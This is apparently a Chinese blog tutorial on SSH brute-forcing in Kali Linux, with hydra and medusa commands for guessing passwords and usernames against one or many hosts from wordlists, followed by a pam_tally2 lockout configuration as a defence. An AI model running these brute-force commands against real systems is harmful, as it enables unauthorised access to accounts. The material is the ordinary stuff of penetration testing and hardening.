Kali下的SSH爆破工具

1.hydra(九头蛇)工具

  • 使用已知用户,进行密码爆破

hydra -l zhangsan -P /root/passwd.txt ssh://192.168.10.1

  • 使用已知密码,进行用户爆破

hydra -L /root/user.txt -p 123.com ssh://192.168.10.1

  • 使用用户字典、密码字典,对多个目标主机进行爆破

hydra -L /root/user.txt -P /root/passwd.txt -M /root/hosts.txt ssh


2.medusa(美杜莎)工具

  • 使用已知用户,进行密码爆破

medusa -h 192.168.232.138 -u zhangsan -P /root/passwd.txt -M ssh

  • 使用已知密码,进行用户爆破

medusa -h 192.168.232.138 -U /root/user.txt -p 123.com -M ssh

  • 使用用户字典、密码字典,对多个目标主机进行爆破

medusa -H /root/hosts.txt -U /root/user.txt -P /root/passwd.txt -M ssh


3.使用pam认证模块pam_tally2.so,限制用户登录次数,以及账户锁定次数

  • 编辑/etc/pam.d/sshd,如下所示:

auth required pam_tally2.so deny=3 onerr=fail unlock_time=300 even_deny_root root_unlock_time=300

#auth    required pam_sepermit.so

  • 解释如下:

onerr=fail 使用失败统计

deny:普通用户密码输入错误后几次,被拒绝登录

even_deny_root:root用户的密码输入错误后几次,被拒绝登录

unlock_time:普通用户锁定时间

root_unlock_time:root用户锁定时间

  • 查看用户失败的登录次数,执行命令如下

pam_tally2

pam_tally2   --user root

重置计数器:pam_tally2   --user root --reset

pam_tally2的计数器日志:/var/log/tallylog

你可能感兴趣的:(Linux,Service)